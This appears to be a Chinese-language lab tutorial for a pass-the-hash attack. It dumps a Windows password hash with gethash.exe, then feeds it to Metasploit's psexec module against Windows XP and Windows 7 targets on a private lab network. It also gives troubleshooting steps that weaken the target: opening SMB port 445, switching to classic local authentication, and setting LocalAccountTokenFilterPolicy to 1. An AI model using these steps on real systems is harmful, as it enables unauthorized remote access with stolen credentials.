获取hash
在Windows(XP)上运行gethash.exe -dhl
1 | tools:1003:44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4::: |
启动msf
1 | msfconsole |
1) 加载模块
1 | use exploit/windows/smb/psexec |
2) 设置用户名
1 | set SMBUser tools |
3) 设置smbpass
1 | set SMBPass 44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4 |
4) 攻击
1 | run |
报错
1) 连接拒绝
靶机: Windows XP
1 | [-] 192.168.48.151:445 - Exploit failed [unreachable]: Rex::ConnectionRefused The connection was refused by the remote host (192.168.48.151:445). |
开启Windows XP 的445端口和Server服务
2) 登陆失败
靶机: Windows XP
1 | [-] 192.168.48.151:445 - Exploit failed [no-access]: Rex::Proto::SMB::Exceptions::LoginError Login Failed: The server responded with error: STATUS_LOGON_FAILURE (Command=115 WordCount=0) |
首先检测SMBPass的值是否正确Win + R打开gpedit.msc
依次打开本地计算机策略 - >计算机配置 - > Windows设置 - >安全设置 - >本地策略 - >安全选项
修改网络访问:本地帐户的共享和安全模式为经典 - 本地用户身份验证
3) 共享服务不允许远程访问
较新的Windows系统默认情况下是不允许的
靶机:Windows 7
1 | [-] 192.168.48.144:445 - Exploit failed [no-access]: Rex::Proto::SMB::Exceptions::ErrorCode The server responded with error: STATUS_ACCESS_DENIED (Command=117 WordCount=0) |
将注册表中LocalAccountTokenFilterPolicy的值更改为1
1 | [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System] |